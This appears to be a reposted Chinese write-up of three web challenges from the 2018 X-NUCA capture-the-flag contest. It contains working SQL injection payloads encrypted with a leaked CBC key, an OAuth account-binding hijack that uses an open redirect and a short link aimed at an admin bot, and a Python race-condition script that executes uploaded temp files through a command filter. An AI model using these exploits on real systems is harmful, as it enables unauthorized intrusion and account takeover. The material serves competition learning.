2. 程式人生 > >CTF-WEB 2018 X-NUCA

CTF-WEB 2018 X-NUCA

阿新 發佈:2019-01-06

1、題目名code check

上去看是一個登陸的介面,robots 原始碼洩露什麼的都沒有,發現通知頁有帶有引數的url:

http://47.107.236.42:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09

不過跑sqlmap沒用,但是有一個提醒,說看起來是base64編碼,但是直接解碼什麼也看不出來。

好奇心隨意點上一層目錄 結果http://47.107.236.42:49882/news可以下載原始碼 這裡使用御劍也可以掃描出來

下載得到原始碼,獲取了id的解密方法

就是一個CBC,先是兩次base64解密,然後在CBC解密。直接換個函式,將mdecrypt_generic換為mcrypt_generic就是加密函式,直接在原版函式上更改一下,變為加密解密函式

使用sql注入,需要使用CBC加密之後傳入給id=》$re = decode($ori,1);

$ori = "2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata# "."hxb2018";

$ori = "2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'# "."hxb2018";

$ori = "2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='mozhe_discuz_stormgroup' and table_name='notice2'# "."hxb2018";

$ori = "2 union select 1,2,group_concat(title),4 from notice2# "."hxb2018";

我還是貼上程式碼吧,使用的一個線上php平臺很好用的,大家可以用它練習http://www.dooccn.com/php/

<?php

//裡面有加密解密 當初用來驗證來著
function decode($data,$type){
	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
	mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
	if($type==0) //0 解密
    {
    	$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    	mcrypt_generic_deinit($td);
    	mcrypt_module_close($td);
    	if(substr(trim($data),-7)!=='hxb2018'){
    		echo '<script>window.location.href="/index.php";</script>';
    	}else{
    		# return substr(trim($data),0,strlen(trim($data))-7);
    		return rtrim($data);
    	}
	}
	else  //1 加密
	{
	    echo $data."\n";
	    $data = mcrypt_generic($td,$data);
	    echo $data."\n";
    	mcrypt_generic_deinit($td);
    	mcrypt_module_close($td);
    	return base64_encode(base64_encode($data));
	}
} 


$id="b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09";

//下面是執行的語句
//$ori = "1 union select 1,2,*,4 from test# "."hxb2018";  
//$ori = "2 union select 1,2,group_concat(title),4 from notice2# "."hxb2018";  
$ori = "2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='mozhe_discuz_stormgroup' and table_name='notice2'# "."hxb2018";
//$ori = "2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'# "."hxb2018";
//$ori = "2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata# "."hxb2018";
$re = decode($ori,1);
//' union select database()# 
echo $re."\n";

$res = decode($re,0);
echo $res;
?>

最後我還要囉嗦兩句,關於sql注入的concat group_concat sunstr limit等這些函式和關鍵字 意義其實非常大,無論是一個一個字元的爆破,還是因為顯示位置不全需要使用組合函式。

 

2 題目名 Blog  連結:https://www.jianshu.com/p/bc106f7147b1

這裡我只是一個簡單敘述原理,關於引數獲取這個由於題目關閉,大家還是看看原文的吧

該題目已經提示了 使用的提示了第三方登入認證方式是OAuth2.0,類似於微信qqq快捷登入一樣的東西,在網上查到不少的利用方式

本題目的第三方登入視窗是這樣的

存在的問題是OAuth2.0的一個快捷登入授權劫持問題,問題出現的本質是帳號可重複繫結不同的第三方郵箱,所以讓admin繫結上我們註冊的郵箱,通過第三方郵箱登入admin帳號即可得到flag。

原理:一個使用者繫結郵箱時,根據在更改繫結頁面填寫的資訊,伺服器會生成一個state和code進行認證,即只要state和code正確,即可繫結成功,並不校驗繫結的賬戶是什麼。所以我們的方法是在繫結時擷取流量中的這條帶有state和code引數的url,然後在提交bug的位置讓管理員機器人去訪問,從而使得管理員綁定了我們的郵箱,登入賬號之後就可以得到flag。

不過這裡有長度要去,所以只能採用跳轉了

由於http://106.75.66.211:8000/main/login?next=/main/login 處存在重定向,所以我們可以通過重定向跳轉到vps上,即http://106.75.66.211:8000/main/login?next=[your_ip] 在vps上寫一個跳轉頁面

<html>
  <script>
    window.open('http://106.75.66.211:8000/main/oauth/?state=9PKyRdpU5D&code=Y5WjDdELjUMGaJpbYfs9lOPBtgEvrOOvZxmmwZsj')
  </script>
</html>

將vps跳轉頁面地址壓縮成短鏈(推薦個短鏈生成地址:https://bitly.com),提交bug,最終提交Url為:http://106.75.66.211:8000/main/login?next=https://bit.ly/2Qiixxx 等待bot訪問後利用第三方郵箱登入

 

3.題目名 ezdotso

這個題目剛開始看起來怪嚇人的,有一個.so檔案,就是linux的連結庫檔案,登陸網頁又有一個原始碼

<?php
$param = array();
parse_str($_SERVER['QUERY_STRING']);
if (isset($action)){  //是否存在action變數
    switch($action){  //判斷action變數內容
        case "php_info":  //如果是php_info
        echo call_user_func_array("php_info",$param);
        break;
        case "cmd":  //如果是cmd
        if(isset($cmd)){
            if(is_string($cmd)){
                if (strlen($cmd)>9){  //如果長度大於9
                    die();
                }
                $pat1 = "/[^0-9a-zA-Z \/\*]/";
                if (preg_match($pat1, $cmd)>0){  //如果滿足該正則失敗
                    die();
                }
                $pat2 = "/^[a-zA-Z]+ [0-9a-zA-Z\/\*]+$/";
                if (preg_match($pat2, $cmd)==0){  //如果不滿足該正則 失敗
                    die();
                }
                system("busybox " . $cmd);  //使用busybox執行我們的shell命令了
            }
        } 
        break;
        default:
        echo call_user_func_array("hello",$param);  //預設的case 顯示hello資訊
        break;
    }
}else{
    show_source(__FILE__);
}

那麼我們就看這三條件吧,首先我們要使用cmd命令

  • 其命令串必須長度小於9
  • 滿足正則,所有的字元必須在[0-9a-zA-Z \/\*]字符集中
  • 滿足正則“部分1 部分2”兩者以空格分開,部分1由[a-zA-Z]組成,部分2在此基礎上可以有數字和/*兩個字元

那就限制了我們可以使用的命令,舉個簡單的例子“ls”肯定是不行,因為第三個條件就過不去,但ls /home是可以的

這個題目在根目錄下使用ls /就可以發現flag檔案,直接?action=cmd&cmd=cat /flag就可以得到flag

這裡需要強調的是這個匹配[^0-9a-zA-Z \/\*] 我們知道[a-z]表示的是a-z字符集,而[^a-z]匹配的則是任何不在a-z之內的字元,^表示非的意思,演示如下:

        

說明我們的所有字元必須都在[0-9a-zA-Z \/\*]之中,不在之內的都會被匹配出來導致第二個條件失敗,而第二個正則還是如上所說。

當然這個只是一個取巧的,這正做的還的是這一個

2018 X-NUCA ezdotso 條件競爭解法  來自https://xz.aliyun.com/t/3476

通過cmd=ls /h*/* 可以發現有個readflag 程式,所以思路比較清晰了執行readflag 就能拿到flag了。
可以通過busybox /h*/r* 但是這樣不滿足正則。陷入僵局。
php上傳產生的臨時檔案再次發揮了作用
php在上傳檔案的時候會在/tmp/ 資料夾下面生成/tmp/phpxxxxxx 檔案,所以我們可以在上傳的同時去執行
sh /t*/p* 剛好9個字元。

import requests
import threading
import os

url = "http://u.cn:3423"

payload = "sh /t*/p*"
assert(len(payload)<10)
params = {"action":"cmd", "cmd":payload}
files = {"hhh":"cat /var/www/html/index.php"}

def go():
    r = requests.post(url, params=params, files=files)
    #print(repr(r.text))
    if "0<br>1<br>" != r.text:
        print(r.text)
        os._exit(0)


def upload():
    r = requests.post(url, files=files)

while True:
    t = threading.Thread(target=go, args=())
    t.start()
    #t = threading.Thread(target=upload, args=())
    #t.start()

 

還有有關使用的

https://www.cnblogs.com/niuni-623/p/6520680.html

http://tool.oschina.net/regex

https://www.cn-space.com/2018/11/27/1/

https://xz.aliyun.com/t/3428

 

 

 

 

 

 

相關推薦

CTF-WEB 2018 X-NUCA

1、題目名code check 上去看是一個登陸的介面,robots 原始碼洩露什麼的都沒有,發現通知頁有帶有引數的url: http://47.107.236.42:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09

CTF-web Xman-2018 msic習題

xman misc CRC碰撞 4位元組小檔案 下載下來的是一個壓縮包,裡面是很多小的壓縮包,每個檔案只有四位元組,滿足CRC爆破。   使用指令碼,將碰撞出來的拼接在一起 # coding:utf-8 import zipfile import strin

CTF-web Xman-2018 第二天 古典密碼和現代密碼

這是大師傅的wiki https://ctf-wiki.github.io/ctf-wiki/crypto/introduction/?ADUIN=1528736192&ADSESSION=1533260489&ADTAG=CLIENT.QQ.5545_.0&ADPUBN

CTF-web Xman-2018 010 editor 簡單使用

在學msic時候,發現010是一個非常好用的工具,除了是一個檢視和修改檔案的編譯器外,還有很多自帶的指令碼可以幫助我們輔助分析檔案格式   這是他的主介面,可以通過選項改變觀察方式 在插入點的位置直接輸入就可以覆蓋原來的資料,點選delet就可以刪除前一位元組

CTF-web Xman-2018 第一天 入營msic

廣度大,深度不怎麼深,涉及的方面有各種加密,流量分析,隱寫,檔案恢復等 這種型別的題目主要是在於手中的工具要全,很多時候都是依靠工具來完成的,一部分是自己如何找到題目的要點,使用對的工具 考的東西:         細心50 &

CTF-web Xman-2018 第三天 crypto-RSA

RSA 這個演算法先不多說,在密碼學的學習中,肯定是少不了數學,要想弄明白一個密碼,基本的數學原理還是必須要懂得,其實每個步驟的大致原理必須懂,有關數學原理公式推導可以暫時不要深究,但是涉及演算法步驟的必須懂。RSA作為一個非常火熱的加密演算法,其大致的原理還是較為容易理解,而攻擊的方法也只需要

CTF-web Xman-2018 第二天 CBC加密簡單介紹

Padding oracle attack 這是一個分塊的加密演算法,當前塊的加密依靠前一個塊的加密結果,形式如下圖: 可以看出,為了滿足當前與前一塊的規則,它初始化了一個向量V,用於第一輪加密。 將分組的明文與上一組的密文進行計算得到該組的密文,繼續做下一組的【V向量】(V就是指

CTF-web xman-2018 第八天 web 模板注入 序列化執行

    python程式碼審計 php包容性更大的語言,針對web,簡單一些所以大家用這個 python出現後,更加的中性一些,有更多的庫,以其為技術基礎的東西也很多,比如flask模板等。 企業中java多,但是不適合初學者,呼叫棧特別多,反序列化,表示式執

CTF-web XMAN-2018 第七天 web 檔案包含與cookie會話

優先看一看有沒有一些危險的函式,這樣很可能存在命令執行。 反引號可以直接執行系統命令。 不是php的話,會當做文字檔案顯示,還可以包含一個一句話木馬(對檔案型別沒有要求)   檔案包含作用 重用程式碼,相當於c語言標頭檔案的感覺。常見的幾個檔案包含函式,require沒有檔

CTF-web Xman-2018 第六天 sql注入

對於新的題目,不能侷限於自己以前的trik,這是一個誤區。其實做題,主要還是看有什麼功能,掃一下路徑和資訊,需要根據它具有的功能來測試可能有的漏洞。 每個惡意的payload都需要我們對測試進行觀察,會有什麼錯誤,為什麼會這樣。猜測後臺程式碼是怎麼寫的。 還有一個需要防範的就是誤導,一個題目

CTF-web Xman-2018 第五天 WEB習題2

檢視原始碼 http://120.24.86.145:8002/web2/ 沒什麼可說的 直接檢視原始碼就可以   帶有轉義的編碼 http://120.24.86.145:8002/web3/     進入之後看到一串奇怪的東西 &

CTF-web Xman-2018 第四天 WEB習題1

例題 localhoost訪問 更改x-forwarded-for=127.0.0.1   api呼叫  http://web.jarvisoj.com:9882/ 目錄掃一下沒什麼特別的東西,看一下原始碼發現了關鍵程式碼 <script> fun

CTF-web Xman-2018 第五天 xss csrf

xss常見套路 對於xss,實際上就是把我們提交上去的資料當做程式碼執行,對於這種實際上有很多種情況可以攻擊,下面具體介紹一些常用的套路。 先看一些小trik 很多HTML標記中的屬性都支援javascript:[code]偽協議的形式. <table background="ja

CTF-web Xman-2018 crypto 古典密碼和簡單入門rsa題目

Rotator  這是一道凱撒密碼的題目,題目裡提示先五移位,在八移位就可以得到 完成,這裡使用的軟體米斯特安全工具或者使用線上的工具也可以   單表替換密碼 Lw! Gyzvecy ke WvyVKT! W'zz by reso dsb

CTF-web Xman-2018 第四天 WEB 初講

web作為CTF中的一類大題目,涉及的面非常廣,前面具體也說過一些類別的題目。 https://blog.csdn.net/iamsongyu/article/details/82968532 l給定一個web網站 l根據題目所給提示資訊,找到網站上的flag字串 l做題方

i春秋CTF web題(1)

信息安全 script 鏈接 eva 意義 clas val IV oba 之前邊看writeup,邊做實驗吧的web題,多多少少有些收獲。但是知識點都已記不清。所以這次借助i春秋這個平臺邊做題,就當記筆記一樣寫寫writeup(其實都大部分還是借鑒其他人的writeup)

CTF web 201808

管理系統 ont 特性 valid pass name class die 返回值 實驗吧--天網管理系統 考察點:md5特性、反序列化漏洞,php布爾弱類型 查看源碼,發現 表示username的md5值==0,這裏利用了md5的一個漏洞,凡是0e開頭的字符串會被解釋為

Hands-On Unity 2018 x 移動遊戲開發教程

  Hands-On Unity 2018 x Game Development for Mobile 使用Unity 2018.2建立具有出色遊戲功能的精彩遊戲   想學習在Unity製作遊戲,但不知道從哪裡開始?現在,遊戲開發比以往任何時候都更受歡迎,而且從

實驗吧-CTF-web-忘記密碼了&&這個看起來有點簡單 (學習筆記)

實驗環境 firefox BurpsuitePro-v1.6 sqlmap(kali) 忘記密碼了 題目為一個連結 開啟是一個輸入郵箱接收重置密碼的網頁,檢視原始碼發現管理員郵箱,vim格式,可能會有一個備份檔案.swp,還有一個重置密碼連結 構造一下url,改為http

實驗吧-CTF-web-頭有點大&&貌似有點難&&看起來有點難(學習筆記)

實驗環境 sqlmap(kali2.0) BurpsuitePro-v1.6 firefox 頭有點大 題目連結:http://www.shiyanbar.com/ctf/29 打開發現說缺少 .net framework9.9,但是沒有9.9版本,還要求在英格蘭地區